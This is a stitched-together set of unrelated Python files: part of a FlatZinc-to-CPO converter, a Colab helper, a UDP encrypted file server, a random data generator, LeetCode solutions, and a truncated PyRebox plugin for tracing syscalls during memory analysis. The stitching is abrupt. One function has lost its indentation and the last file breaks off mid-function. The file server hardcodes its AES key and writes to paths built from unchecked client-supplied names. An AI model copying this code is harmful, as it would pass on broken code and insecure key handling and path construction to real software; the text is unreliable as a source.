    # Check no reduction: emit the constraint directly
    defvar = fc.defvar
    if not self.reduce or not defvar:
        expr = op(modeler.scal_prod(self._get_cpo_expr(coefs), self._get_cpo_expr(vars)), self._get_cpo_expr(res))
        if reif:
            expr = modeler.equal(self._get_cpo_expr(reif), expr)
        self._add_to_model(expr)
        return
    # Get array elements
    coefs = _get_fzn_array(coefs)
    vars = _get_fzn_array(vars)
    # Check if defined variable is the result (or the reifying variable)
    if defvar is res or defvar is reif:
        expr = self._build_scal_prod_expr(coefs, vars, 0)
    else:
        # Defined variable appears inside the product: solve for it, i.e.
        # rearrange so that defvar = (res - sum(other terms)) / its coefficient
        vx = vars.index(defvar)
        vcoef = coefs[vx]
        vars = vars[:vx] + vars[vx + 1:]
        coefs = coefs[:vx] + coefs[vx + 1:]
        expr = res if is_int(res) else self._get_cpo_expr(res)
        if vcoef < 0:
            # Negative coefficient: negate both sides instead of dividing by it
            vcoef = -vcoef
            expr = -expr
        else:
            coefs = list([-c for c in coefs])
        # Build result
        expr = self._build_scal_prod_expr(coefs, vars, expr)
        if vcoef != 1:
            expr = expr / vcoef
    # Check reif: the defined variable holds the truth value of the relation
    if reif:
        expr = op(expr, self._get_cpo_expr(res))
        self._assign_to_var(defvar, expr)
    else:
        # Check equality with a variable: equality allows direct substitution
        if op is modeler.equal:
            self._assign_to_var(defvar, expr)
        else:
            self._add_to_model(op(expr, self._get_cpo_expr(defvar)))
def _build_scal_prod_expr(self, coefs, vars, res):
    """ Build a scal prod expression
    Args:
        coefs: Array of coefficients (integers)
        vars: Array of FZN variables
        res: Initial result value (integer)
    Returns:
        New CPO scal_prod expression
    """
    # Build array of CPO variables
    vars = [self._get_cpo_expr(v) for v in vars]
    # Check developed scal_prod: for short arrays or unit coefficients,
    # a plain sum/difference chain is simpler than a scal_prod node
    if len(coefs) <= 2 or (all(c == 1 or c == -1 for c in coefs)):
        for c, v in zip(coefs, vars):
            if c != 0:  # zero coefficients contribute nothing
                if is_int_value(res, 0):
                    res = _mutl_by_int(v, c)
                elif c < 0:
                    res = res - _mutl_by_int(v, -c)
                else:
                    res = res + _mutl_by_int(v, c)
        return res
    # Build normal scal_prod, offset by the initial value when non-zero
    expr = modeler.scal_prod(coefs, vars)
    if not is_int_value(res, 0):
        expr = res + expr
    return expr
def _add_to_model(self, expr):
""" Add an expression to the CPO model
Args:
expr: CPO expression to add
"""
#print("_add_to_model({})".format(expr))
self.model.add(expr)
# Scan expression to identify used variables
estack = [expr]
doneset = set() # Set of expressions already processed
while estack:
e = estack.pop()
eid = id(e)
if not eid in doneset:
doneset.add(eid)
if e.type.is_variable:
#print(" add CPO variable {}".format(e))
self.cpo_variables.add(e.name)
# Stack children expressions
estack.extend(e.children)
def _write(self, out=None):
    """ Write current parser status.

    Args:
        out (optional): Output stream; sys.stdout if not given
    """
    stream = sys.stdout if out is None else out
    stream.write("Reader status:\n")
    stream.write(" CPO expressions:\n")
    for key in sorted(self.cpo_exprs.keys()):
        val = self.cpo_exprs[key]
        stream.write(" {}: {} ({})\n".format(key, val, type(val)))
    stream.write(" Model expressions:\n")
    for entry in self.model.get_all_expressions():
        stream.write(" {}\n".format(entry[0]))
###############################################################################
## Utility functions
###############################################################################
def _get_fzn_array(fzo):
    """ Get the list of objects of an FZN object.

    Args:
        fzo: FZN object, or an already-expanded python list
    Returns:
        Array of FZN objects
    """
    if isinstance(fzo, list):
        return fzo
    return fzo.value
def _get_value(expr):
    """ Get the python value of an expression.

    Args:
        expr: Expression (python or CPO)
    Returns:
        The wrapped python value when expr is a CpoValue, else expr itself
    """
    if isinstance(expr, CpoValue):
        return expr.value
    return expr
def _build_domain(v):
    """ Build a variable domain from an initial value.

    Args:
        v: Variable initial value
    Returns:
        Single-value domain tuple; the booleans True/False map to (1,)/(0,)
    """
    # Identity checks on purpose: 1 == True but 1 is not the bool singleton
    for literal, domain in ((True, (1,)), (False, (0,))):
        if v is literal:
            return domain
    return (v,)
# def _build_cpo_value(v):
# """ Build a value from a single Python value
# Args:
# v: Value
# Returns:
# Corresponding CPO value
# """
# if v is True:
# v = 1
# elif v is False:
# v = 0
# return build_cpo_expr(v)
def _mutl_by_int(expr, val):
    """ Create an expression that multiplies an expression by an integer.

    Args:
        expr: Expression to multiply
        val: Integer value to multiply expression with
    Returns:
        Simplified product: expr for 1, -expr for -1, 0 for 0, val * expr otherwise
    """
    # Special-case the unit and zero multipliers to avoid useless product nodes
    if val == 0:
        return 0
    if val == 1:
        return expr
    if val == -1:
        return -expr
    return val * expr
|
def mount_drive():
    """ Mount Google Drive in a Colab runtime and return the working folder paths.

    Returns:
        Tuple (my_drive, image_folder, training_folder) of path strings
    """
    # Colab-only dependency; the import is local so the module can be loaded
    # outside of Colab without failing
    from google.colab import drive
    drive.mount('/content/gdrive')
    my_drive = '/content/gdrive/My Drive/'
    image_folder = my_drive + 'TestImages/'
    # NOTE(review): "Traning" looks like a typo for "Training" -- left as-is
    # since the actual Drive folder may really be named this way.
    training_folder = my_drive + "Traning/"
    return my_drive, image_folder, training_folder
import socket
from Cryptodome.Cipher import AES
import time
import os.path, os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from lazyme.string import color_print
# closing will close the file and exit the client program
# def closing():
# print('closing socket')
# s.close()
# exit()
#sending will send a file to the client
def sending(name, fname):
    """ Encrypt a file chunk-by-chunk and send it to the client over UDP.

    Each chunk is AES-EAX encrypted with a fresh nonce; the per-chunk tag and
    nonce are wrapped with the recipient's RSA public key (OAEP/SHA-256) and
    sent first, then the ciphertext itself.

    Args:
        name:  Client user name (bytes); selects the RSA public key PEM file
        fname: Name of the file to send (bytes)
    """
    server_address = (socket.gethostname(), 10100)  # destination for data packets
    buffer = 4000  # plaintext chunk size read per datagram
    key = b'Sixteen byte key'  # key = get_random_bytes(16)
    # Load the recipient public key once, before the loop (it was previously
    # re-read from disk for every chunk).
    user_pem = 'server_files/keys/' + name.decode() + '.pem'
    print('[!] using pem file to encrypt : ', user_pem)
    with open(user_pem, "rb") as key_file:
        public_key = serialization.load_pem_public_key(
            key_file.read(),
            backend=default_backend()
        )
    # 'with' guarantees the plaintext file is closed even if sending fails
    # (it was previously never closed).
    with open(fname.decode(), 'r') as message:
        while True:
            snippet = message.read(buffer)  # read buffer-sized section of the file
            if len(snippet) < 1:
                break  # no more of the file to be read
            # Fresh cipher/nonce per chunk; tag allows integrity-checking
            cipher = AES.new(key, AES.MODE_EAX)
            nonce = cipher.nonce
            ciphertext, tag = cipher.encrypt_and_digest(snippet.encode("utf-8"))
            # Wrap the AES nonce and tag with the recipient's public key
            meta_decrypt = b'uniqueword' + tag + b'uniqueword' + nonce
            print("[!] nonce : ", nonce, " tag : ", tag)
            AES_meta_encrypted = public_key.encrypt(
                meta_decrypt,
                padding.OAEP(
                    mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(),
                    label=None
                )
            )
            s.sendto(AES_meta_encrypted, server_address)  # metadata first
            time.sleep(.05)  # required to send each section error-free
            s.sendto(ciphertext, server_address)  # then the chunk ciphertext
#receiving will recieve a file from the client
def receiving(ciphertext):
    """ Receive and process encrypted messages from the client.

    The first datagram (passed as *ciphertext*) carries the RSA-wrapped AES
    nonce/tag; subsequent datagrams carry AES-EAX ciphertext.  Messages start
    with a 13-character instruction prefix selecting verify/add/remove
    handling.  Uses module globals s, buf, key.

    Args:
        ciphertext: First received datagram (the encrypted AES metadata)
    """
    try:
        while (True):
            nonce, tag = meta_decrypt(ciphertext)
            ciphertext, address = s.recvfrom(buf)  # receive ciphertext sent
            #print('received {}'.format(ciphertext))
            cipher = AES.new(key, AES.MODE_EAX, nonce=nonce)  # cipher object for decryption
            plaintext = cipher.decrypt(ciphertext)
            decoded_plaintext = plaintext.decode()
            instruction = decoded_plaintext[0:13:1]  # 13-char instruction prefix
            decoded_plaintext = decoded_plaintext[13:]  # discard extracted information
            print('[*] instruction : ', instruction)
            if instruction == "__verify__msg":
                # Username and filename are comma-appended to the message front
                username = decoded_plaintext[:decoded_plaintext.find(",")]
                decoded_plaintext = decoded_plaintext.replace(username+',', '')  # discard username
                filename = decoded_plaintext[:decoded_plaintext.find(",")]
                decoded_plaintext = decoded_plaintext.replace(filename+',', '')  # discard filename
                print("username : ", username, " filename : ", filename)
                try :
                    verified = verification(username.encode())
                    if not verified :
                        raise ValueError
                except ValueError:
                    print("Key incorrect or message corrupted or access from unverified user")
                    print('Not processing request!')
                    return
            # NOTE(review): if the instruction was not "__verify__msg",
            # 'username', 'filename' and 'verified' below are unbound and the
            # code raises NameError (which escapes the 'except ValueError'
            # handler) -- TODO confirm intended protocol flow.
            if decoded_plaintext[0:13:1] == "__verify__add":
                decoded_plaintext = decoded_plaintext[13:]+" "
                print("adding : ", decoded_plaintext)
                add_user(decoded_plaintext)
                return
            elif decoded_plaintext[0:13:1] == "__verify__rmv":
                decoded_plaintext = decoded_plaintext[13:]+" "
                print("removing : ", decoded_plaintext)
                rmv_user(decoded_plaintext)
                return
            # try to verify message with tag. If its been changed in transit,
            # throw ValueError and close file/socket and exit
            try:
                if not verified :
                    raise ValueError
                cipher.verify(tag)  # verify the tag to check integrity
                print("The message is authentic : ", decoded_plaintext, " from : ", username)
                f = open('server_files/files/'+filename, 'wb')  # file that will be written to
                f.write(decoded_plaintext.encode())
            except ValueError:
                print("Key incorrect or message corrupted or access from unverified user")
                print('Closing')
                s.close()
                exit()
            # Wait (max 2s) for the next metadata datagram
            s.settimeout(2)
            ciphertext, address = s.recvfrom(buf)
    except socket.timeout:
        # No more chunks: close everything and terminate
        # NOTE(review): 'f' is unbound here if no file chunk was ever written
        # before the timeout -- TODO confirm.
        print('closing')
        f.close()
        s.close()
        exit()
def verification(username):
    """ Check whether a user is allowed to send messages.

    Args:
        username: User name (bytes)
    Returns:
        1 if the user is listed in verified_users.txt and not banned, 0 otherwise
    """
    username = username.decode().strip()
    # The banned list wins over the verified list; 'with' closes the handles
    # (they were previously left open).
    with open("server_files/banned_users.txt") as banned:
        for line in banned:
            # BUG FIX: the line was compared without strip(), so its trailing
            # newline made the ban check never match (the verified loop below
            # already stripped).
            if username == line.strip():
                msg = "Message from bad user : " + username + "\n"
                color_print(msg, color="red", underline=True)
                return 0
    with open("server_files/verified_users.txt") as verified:
        for line in verified:
            if username == line.strip():
                msg = "Message from verified : " + username + "\n"
                color_print(msg, color="green", underline=True)
                return 1
    # Unknown user: treat as bad
    msg = "Message from bad user : " + username + "\n"
    color_print(msg, color="red", underline=True)
    return 0
def add_user(new_user_info):
    """ Register a new verified user and store their public key PEM file.

    Args:
        new_user_info: String of the form "<username> __verify__key<pem-data>"
    """
    key_start = new_user_info.find('__verify__key') + 13
    username = new_user_info[:(new_user_info.find('__verify__key')-1)].strip()
    print('un : ', username)
    key = new_user_info[key_start:]
    # 'with' flushes and closes the files (the original left both handles open,
    # so writes could be lost and descriptors leaked).
    with open("server_files/verified_users.txt", 'a') as write_verified:
        write_verified.write(username + "\n")
    new_user_pem_file = ('server_files/keys/' + username + '.pem').strip()
    with open(new_user_pem_file, 'wb') as write_key:
        write_key.write(key.encode())
def rmv_user(new_user_info):
    """Remove a user from the verified list and delete their stored key.

    *new_user_info* carries the username (everything before the
    '__verify__key' marker). When the user has no stored .pem key they are
    not a verified member and nothing is changed.
    """
    username = new_user_info[:new_user_info.find('__verify__key') - 1].strip()
    verified_file = "server_files/verified_users.txt"
    print('un : ', username)
    key_path = "server_files/keys/" + username + ".pem"
    if not os.path.exists(key_path):
        print("The user is not a verified member in the group")
        return
    os.remove(key_path)
    # Read the current list, then rewrite it without the removed user.
    # (The original leaked the read handle and truncated the file twice.)
    with open(verified_file) as f:
        entries = list(f)
    print("read : ", entries)
    with open(verified_file, 'w') as f:
        for item in entries:
            if item.strip() != username:
                print("writing : ", item)
                f.write("%s" % item)
    print("[!] User removed ", username)
def meta_decrypt(meta_decrypt):
    """RSA-decrypt the metadata blob and split out the AES tag and nonce.

    The argument is the RSA-OAEP ciphertext of a byte string that appears
    to be laid out as b'uniqueword' + tag + b'uniqueword' + nonce
    (assumed from the slicing below -- TODO confirm against the sender).
    Returns a (nonce, tag) tuple.
    """
    # Server's RSA private key. `serialization` / `default_backend` come
    # from the `cryptography` package imported elsewhere in this file.
    with open("server_files/server_keys/private_key.pem", "rb") as key_file:
        private_key = serialization.load_pem_private_key(
            key_file.read(),
            password=None,
            backend=default_backend()
        )
    # RSA-OAEP with SHA-256 for both MGF1 and the hash, matching the
    # client-side encryption parameters.
    AES_meta = private_key.decrypt(
        meta_decrypt,
        padding.OAEP(
            mgf=padding.MGF1(algorithm=hashes.SHA256()),
            algorithm=hashes.SHA256(),
            label=None
        )
    )
    # Drop the leading 10-byte b'uniqueword' marker.
    AES_meta = AES_meta[10:]
    tag = AES_meta[:AES_meta.find(b'uniqueword')] #separate ciphertext and tag from ciphertext variable
    # NOTE(review): this drops another 10 bytes from the *front*, not past
    # the tag; combined with the find()+10 below it looks fragile if the
    # tag itself happens to contain b'uniqueword' -- verify the layout.
    AES_meta = AES_meta[10:]
    nonce = AES_meta[(AES_meta.find(b'uniqueword')+10):] #separate nonce from ciphertext variable
    return nonce, tag
# ---- server start-up and main receive loop ---------------------------
# Create a UDP/IP socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind the socket to the port
server_address = (socket.gethostname(), 10000)
print('starting up on {} port {}'.format(*server_address))
s.bind(server_address) #bind the socket to the address
buf = 4096 #reading buffer size
# NOTE(review): hard-coded AES key -- acceptable for an exercise, not for
# real deployments.
key = b'Sixteen byte key' # Generate key for AES encryption
print('[*]Waiting for a connection')
# Each datagram is either a download request ("<user>isafile<filename>")
# or an encrypted upload handled by receiving().
while(True):
    ciphertext, address = s.recvfrom(buf) #receive ciphertext sent
    print("[*]Recived ciphertext")
    name_index = ciphertext.find(b'isafile')
    name = ciphertext[:name_index]
    # if there is an 'isafile' marker, call the sending function,
    # else call the receiving function
    ignore1, ignore2, filename = ciphertext.rpartition(b'isafile')
    if ignore2 :
        try :
            # Only verified users may download files.
            verified = verification(name)
            if not verified :
                raise ValueError
            else :
                print("[*] sending : ", filename)
                sending(name, filename)
        except ValueError:
            print("Key incorrect or message corrupted or access from unverified user")
            print('Not processing request!')
    else:
        receiving(ciphertext)
|
import random
import sys
import datetime
def main(data_size, file_num):
    """Write data<file_num>.txt containing *data_size* random integers.

    The first line holds the size and a randomly chosen 'track' index in
    [1, data_size - 2]; each following line is one value in [0, 10000].
    """
    out_path = "data" + str(file_num) + ".txt"
    with open(out_path, "w") as out:
        track = random.randint(1, data_size - 2)
        out.write("{} {}\n".format(data_size, track))
        out.writelines(str(random.randint(0, 10000)) + "\n"
                       for _ in range(data_size))
if __name__ == "__main__":
    # Expect exactly two arguments: <data_size> <file_num>.
    if not (len(sys.argv) == 3):
        # BUG FIX: the original used a Python 2 print statement (a syntax
        # error under Python 3) and then fell through to index sys.argv
        # anyway; report the usage and exit instead.
        print("Invalid arguments: usage: <data_size> <file_num>")
        sys.exit(1)
    # Seed with the current second so repeated runs differ.
    random.seed(datetime.datetime.today().second)
    main(int(sys.argv[1]), sys.argv[2])
|
# Problem 1: Two Sum
class Solution(object):
    def twoSum(self, nums, target):
        """
        :type nums: List[int]
        :type target: int
        :rtype: List[int]

        Return indices of the two distinct elements of nums that sum to
        target (exactly one solution is assumed to exist; the same
        element may not be used twice).
        """
        # One-pass hash map: O(n) time / O(n) space instead of the
        # original O(n^2) double loop. For each value, check whether the
        # complement needed to reach target was already seen.
        seen = {}  # value -> index of its first occurrence
        for i, value in enumerate(nums):
            complement = target - value
            if complement in seen:
                return [seen[complement], i]
            seen[value] = i
# Problem 2: Implement a Queue Using Stacks
class MyQueue(object):
    # Implement a FIFO queue using only standard stack operations
    # (push-to-top, pop-from-top, peek-at-top, size, is-empty).
    #
    # Amortized O(1) design: stack1 ("inbox") receives pushes; stack2
    # ("outbox") serves pops and peeks. Elements are transferred from the
    # inbox to the outbox only when the outbox runs dry, so each element
    # is moved at most once -- unlike the original, which reversed the
    # whole queue twice on every push (O(n) per push).
    def __init__(self):
        """
        Initialize your data structure here.
        """
        self.stack1 = []  # inbox: newest element on top
        self.stack2 = []  # outbox: oldest element on top
    def push(self, x):
        """
        Push element x to the back of queue. O(1).
        :type x: int
        :rtype: None
        """
        self.stack1.append(x)
    def pop(self):
        """
        Removes the element from in front of queue and returns that element.
        Amortized O(1).
        :rtype: int
        """
        self._shift()
        return self.stack2.pop()
    def peek(self):
        """
        Get the front element (no removal).
        :rtype: int
        """
        self._shift()
        return self.stack2[-1]
    def empty(self):
        """
        Returns whether the queue is empty.
        :rtype: bool
        """
        # The queue's elements may live in either stack.
        return not self.stack1 and not self.stack2
    def _shift(self):
        # Refill the outbox from the inbox (reversing order to FIFO), but
        # only when the outbox is empty -- otherwise order would break.
        if not self.stack2:
            while self.stack1:
                self.stack2.append(self.stack1.pop())
# Your MyQueue object will be instantiated and called as such:
# obj = MyQueue()
# obj.push(x)
# param_2 = obj.pop()
# param_3 = obj.peek()
# param_4 = obj.empty()
|
# mdump basic function
from __future__ import print_function
import time
import sys
from api import CallbackManager
import api
import bisect
from collections import defaultdict
import functools
from volatility.plugins.overlays.windows.xp_sp2_x86_syscalls import syscalls
from utils import ConfigurationManager as conf_m
# PyRebox plugin dependencies the framework must load before this script.
requirements = ["plugins.guest_agent"]
# Callback manager (set in initialize_callbacks)
cm = None
# Printer supplied by PyRebox (set in initialize_callbacks); None until then
pyrebox_print = None
# Directory where DAMM databases and the text log are written
mdump_path = "dump_result/"
# Max running time (seconds), read from the [MDUMP] section of the config.
try:
    MAX_RUNNING_TIME = int(conf_m.config.get('MDUMP', 'runtime'))
except Exception:
    # BUG FIX: pyrebox_print is still None while the module loads, so the
    # original call here raised a TypeError that masked the real problem;
    # plain print() works at import time.
    print("No run time is specified, the default run time will be used.")
    MAX_RUNNING_TIME = 600
# script initial start time (set when the target process is created)
s_start_time = 0
# minimum time gap (seconds) between DAMM dumps in 'tb' mode
mdump_interval = 10
# timestamp of the last DAMM call in 'tb' mode
mdump_tb_time = 0
# number of the next DAMM .db result file
db_num = 0
# number of the next diff.json file (diffing currently disabled)
diff_num = 1
# MAX_TB_NUM = 1000000
# tb_num = 0
# whether to call DAMM at all ("True"/"False" string from config)
MDUMP_DAMM = conf_m.config.get('MDUMP', 'damm')
# make sure damm executes once before NtUserGetMessage ('tb' mode)
MDUMP_FLAG = True
# whether to also write log lines to a txt file ("True"/"False" string)
MDUMP_LOG = conf_m.config.get('MDUMP', 'text_log')
# a buffer that stores the log lines until they are flushed in batches
mdump_buffer = []
# Tracing-mode constants: dump at every syscall, at every resolved API
# call, or rate-limited per translation block.
MDUMP_AT_SYSCALL = 1
MDUMP_AT_CALL_API = 2
MDUMP_AT_RUN_TB = 3
MDUMP_MODE_TYPE = MDUMP_AT_SYSCALL
# Select the tracing mode from config; anything other than 'api' or
# 'syscall' falls through to translation-block ('tb') mode.
mdump_mode = conf_m.config.get('MDUMP', 'mode')
if mdump_mode not in ['api', 'syscall', 'tb']:
    # BUG FIX: pyrebox_print is still None while the module loads, so the
    # original call raised TypeError; report the bad mode with print().
    print("error API LIST mode:{}".format(mdump_mode))
if mdump_mode == 'api':
    MDUMP_MODE_TYPE = MDUMP_AT_CALL_API
elif mdump_mode == 'syscall':
    MDUMP_MODE_TYPE = MDUMP_AT_SYSCALL
else:
    MDUMP_MODE_TYPE = MDUMP_AT_RUN_TB
# modules of the process: name -> (base, size); the (0, 0) default marks
# "not loaded yet"
modules = defaultdict(lambda :(0,0))
# symbols info: becomes True once a usable symbol list has been built
mdump_symbols_loaded = False
# NOTE(review): Python 2 integer division; under Python 3 this would be a
# float (the __future__ import above only changes print) -- confirm the
# intended interpreter.
TARGET_LONG_SIZE = api.get_os_bits() / 8
process_syms = []
target_procname = conf_m.config.get('MDUMP', 'target')
# On-disk cache of the serialized process symbol list
process_symbols_file = "/tmp/proc.symbols."+target_procname+'.'+conf_m.config.get('VOL', 'profile')+'.bin'
# symbols for ntdll
ntdll_syms = []
ntdll_name= "ntdll.dll"
ntdll_symbols_file = "/tmp/ntdll.symbols."+conf_m.config.get('VOL', 'profile')+'.bin'
# Resolved at runtime from the ntdll symbols; -1 means "not found yet".
KiFastSystemCall_addr = -1 #xp sp2=0x7c92e4f0
KiFastSystemCall_name = "KiFastSystemCall"
# winXP_Exclude_syscalls = [0x11a5, #NtUserGetMessage
#                           0x1165 #NtUserDispatchMessage
#                          ]
winXP_Exclude_syscalls = []
# functools.total_ordering derives <=, >, >= from __lt__ + __eq__,
# removing the hand-written boilerplate of the original six methods.
@functools.total_ordering
class Symbol:
    """A named symbol inside a module, ordered by its address.

    Comparisons look only at ``addr`` so instances can live in a
    bisect-sorted list and be searched with sentinel Symbols.
    """
    def __init__(self, mod, func, addr):
        self.mod = mod    # module name, e.g. "ntdll.dll"
        self.func = func  # function / symbol name
        self.addr = addr  # address (module-relative in this script)
    def __eq__(self, other):
        return self.addr == other.addr
    # Kept explicit: Python 2 does not derive __ne__ from __eq__.
    def __ne__(self, other):
        return self.addr != other.addr
    def __lt__(self, other):
        return self.addr < other.addr
def mdump_clean(tmppath):
    """Delete leftover .json/.db/.txt result files under *tmppath*."""
    import os,glob
    stale = []
    for pattern in ("*.json", "*.db", "*.txt"):
        stale.extend(glob.glob(tmppath + pattern))
    for path in stale:
        os.remove(path)
def mdump_print(mdump_log):
    """Buffer *mdump_log* and flush the buffer to the log file in batches.

    Only active when the MDUMP text_log option is "True"; once the buffer
    holds 100 entries it is written out, followed by the new entry.
    """
    global mdump_buffer
    if type(mdump_log) != str:
        mdump_log = str(mdump_log)
    if MDUMP_LOG != "True":
        return
    if len(mdump_buffer) < 100:
        mdump_buffer.append(mdump_log)
        return
    log_path = "{0}/{1}_{2}_log.txt".format(mdump_path, target_procname, mdump_mode)
    with open(log_path, 'a') as out:
        for entry in mdump_buffer:
            out.write(entry + '\n')
        out.write(mdump_log + '\n')
    mdump_buffer = []
def mdump_call_damm():
    """Run one DAMM memory-analysis pass into a new numbered .db file.

    Each invocation writes <mdump_path>/res<db_num>.db and increments
    db_num. Once the configured time budget (MAX_RUNNING_TIME) is spent,
    all callbacks are cleaned up, effectively ending the analysis.
    """
    from libdamm.api import API as DAMM
    # from scripts.dealjson import sqlite_to_json
    # from scripts.dealjson import diff2Graph
    global pyrebox_print
    global cm
    global db_num
    global diff_num
    # Fresh DAMM instance per call; results presumably land in the .db
    # given via the `db=` argument -- TODO confirm against libdamm.
    damm = DAMM(plugins=['all'], profile=conf_m.config.get('VOL', 'profile'), db=mdump_path+"res"+str(db_num)+".db")
    pyrebox_print("damm initialized")
    results = damm.run_plugins()
    # Iterating drives the plugin generator to completion; output itself
    # is not printed here.
    for elem in results:
        # print(elem)
        pass
    # (JSON conversion / diffing between consecutive dumps is disabled.)
    # sqlite_to_json(mdump_path+"res%d.db" % db_num, mdump_path+"res%d.json" % db_num)
    # pyrebox_print("res%d.json file has been created" % (db_num))
    # # compare the diff between two res.json and create diff.json files
    # if db_num > 0:
    #     ret = diff2Graph(mdump_path+"res%d.json" % (db_num-1), mdump_path+"res%d.json" % db_num, mdump_path+"diff%d.json" % diff_num)
    #     print(ret)
    #     if ret is True:
    #         pyrebox_print("diff%d.json file has been created" % diff_num)
    #         diff_num += 1
    db_num += 1
    # Stop the whole analysis once the time budget is exhausted.
    if time.time() - s_start_time >= MAX_RUNNING_TIME:
        pyrebox_print("analyze over :)")
        cm.clean()
def locate_module(addr):
    """Return the name of the loaded module whose address range contains
    *addr*, or None when the address is outside every known module."""
    global modules
    for name, (base, size) in modules.items():
        if base <= addr < base + size:
            return name
    return None
def locate_nearest_symbol(addr):
    """Return the Symbol whose module-relative address equals *addr*'s
    offset within its module, or None when *addr* does not land exactly
    on a known symbol of that module."""
    global process_syms
    mod = locate_module(addr)
    if mod == None:
        return None
    base, size = modules[mod]
    rel = addr - base
    pos = bisect.bisect_left(process_syms, Symbol('', '', rel))
    if pos < 0 or pos >= len(process_syms):
        return None
    # Several modules may own symbols at the same relative address; skip
    # forward over same-address entries until one belongs to `mod`.
    # BUG FIX: the original bound (pos < len(process_syms)+1) let pos run
    # one past the end -- and was checked *after* indexing -- so this
    # could raise IndexError.
    while (pos < len(process_syms)
           and process_syms[pos].mod != mod
           and process_syms[pos].addr == rel):
        pos += 1
    if pos < len(process_syms) and process_syms[pos].addr == rel:
        return process_syms[pos]
    else:
        return None
def mdump_syscall_func(dest_pid, dest_pgd, params):
    """BLOCK_BEGIN_CB callback placed on KiFastSystemCall: log each system
    call of the monitored process and optionally run a DAMM dump.

    dest_pid/dest_pgd are bound via functools.partial at registration;
    params carries the cpu index, cpu state and translation block.
    """
    global pyrebox_print
    global cm
    cpu_index = params['cpu_index']
    cpu = params['cpu']
    tb = params['tb']
    # Sanity check: this callback should only ever fire at the resolved
    # KiFastSystemCall address.
    if cpu.EIP != KiFastSystemCall_addr:
        pyrebox_print("Error in syscall_func")
        return
    if TARGET_LONG_SIZE == 4:
        if not cpu.EAX in winXP_Exclude_syscalls:
            # EAX holds the syscall number; the high nibble selects the
            # service table and the low 12 bits index into it -- assumes
            # the WinXP SP2 x86 layout of the imported `syscalls` table.
            pos = (cpu.EAX & 0xf000) >> 12
            num = (cpu.EAX & 0x0fff)
            if pos > 1 :
                pyrebox_print("Error in syscall index")
                return
            pyrebox_print("[PID:%x] %s:0x%08x" % (dest_pid, syscalls[pos][num], cpu.EAX))
            mdump_print("[PID:%x] %s:0x%08x" % (dest_pid, syscalls[pos][num], cpu.EAX))
            # call DAMM to analyze
            if MDUMP_DAMM == "True":
                mdump_call_damm()
    elif TARGET_LONG_SIZE == 8:
        # 64-bit guests: no syscall-name table here, just log RAX.
        pyrebox_print("[PID:%x] KiFastSystemCall RAX:%016x" % (dest_pid, cpu.RAX))
        mdump_print("[PID:%x] KiFastSystemCall RAX:%016x" % (dest_pid, cpu.RAX))
        if MDUMP_DAMM == "True":
            mdump_call_damm()
def mdump_opcodes(dest_pid, dest_pgd, params):
    """OPCODE_RANGE_CB callback (call opcode 0xFF): log API calls made by
    the monitored process by resolving the branch target to a symbol.

    dest_pid/dest_pgd are bound via functools.partial at registration;
    params carries the cpu index, cpu state, current pc and target pc.
    """
    global pyrebox_print
    global cm
    cpu_index = params['cpu_index']
    cpu = params['cpu']
    pc = params['cur_pc']
    next_pc = params['next_pc']
    # Symbols may not be available yet early in process start-up.
    if not mdump_symbols_loaded:
        return
    try:
        sym = locate_nearest_symbol(next_pc)
        if sym is None:
            return
        mod = sym.mod
        func = sym.func
        base, size = modules[mod]
        real_api_addr = sym.addr + base
        # BUG FIX: the original used `and`, which can never be true (an
        # address cannot be both below the base and past the end); `or`
        # implements the intended range sanity check.
        if real_api_addr < base or real_api_addr >= base + size:
            return
        #pyrebox_print("mod:{}, func:{}, addr:{}".format(mod, func, hex(real_api_addr)))
        # Only log calls that land exactly on an exported symbol.
        if next_pc != real_api_addr:
            return
        if TARGET_LONG_SIZE == 4:
            pyrebox_print("[PID:%x] pc:%08x-->mod:%s,func:%s(%08x)" % (dest_pid, pc, mod, func, real_api_addr))
            mdump_print("[PID:%x] pc:%08x-->mod:%s,func:%s(%08x)" % (dest_pid, pc, mod, func, real_api_addr))
        elif TARGET_LONG_SIZE == 8:
            pyrebox_print("[PID:%x] pc:%016x-->mod:%s,func:%s(%016x)" % (dest_pid, pc, mod, func, real_api_addr))
            mdump_print("[PID:%x] pc:%016x-->mod:%s,func:%s(%016x)" % (dest_pid, pc, mod, func, real_api_addr))
    except Exception as e:
        pyrebox_print(str(e))
        # BUG FIX: `traceback` was never imported and the method is
        # print_exc, not print_exec -- the original handler itself raised.
        import traceback
        traceback.print_exc()
    finally:
        return
def mdump_tb_func(dest_pid, dest_pgd, params):
    """BLOCK_BEGIN_CB callback for 'tb' mode: like mdump_syscall_func, but
    rate-limits DAMM dumps to one per mdump_interval seconds and forces
    one initial dump before the first NtUserGetMessage (0x11a5).
    """
    # (A translation-block-count based trigger was tried and disabled.)
    # global tb_num
    # if tb_num > MAX_TB_NUM:
    #     mdump_call_damm()
    #     tb_num = 1
    # else:
    #     tb_num += 1
    global pyrebox_print
    global cm
    global mdump_tb_time
    global MDUMP_FLAG
    cpu_index = params['cpu_index']
    cpu = params['cpu']
    tb = params['tb']
    # Callback is registered on KiFastSystemCall; anything else is a bug.
    if cpu.EIP != KiFastSystemCall_addr:
        pyrebox_print("Error in syscall_func")
        return
    if TARGET_LONG_SIZE == 4:
        # Run one DAMM pass before the first GUI message-pump call (see
        # the MDUMP_FLAG comment at module level).
        if MDUMP_DAMM == "True" and MDUMP_FLAG:
            mdump_call_damm()
            MDUMP_FLAG = False
        # 0x11a5 is NtUserGetMessage on WinXP SP2 x86 (see the commented
        # exclusion list at module level).
        if cpu.EAX == 0x11a5:
            pos = (cpu.EAX & 0xf000) >> 12
            num = (cpu.EAX & 0x0fff)
            if pos > 1 :
                pyrebox_print("Error in syscall index")
                return
            pyrebox_print("[PID:%x] %s:0x%08x" % (dest_pid, syscalls[pos][num], cpu.EAX))
            mdump_now = time.time()
            # Rate-limit the expensive DAMM pass.
            if mdump_now - mdump_tb_time > mdump_interval:
                mdump_tb_time = mdump_now
                print(mdump_tb_time)
                # call DAMM to analyze
                if MDUMP_DAMM == "True":
                    mdump_call_damm()
def mdump_tb_trace(dest_pid, dest_pgd):
    """Resolve KiFastSystemCall inside ntdll and register the 'tb' mode
    callback (mdump_tb_func) at that address for the target process."""
    global pyrebox_print
    global cm
    global modules
    global ntdll_syms
    global KiFastSystemCall_addr
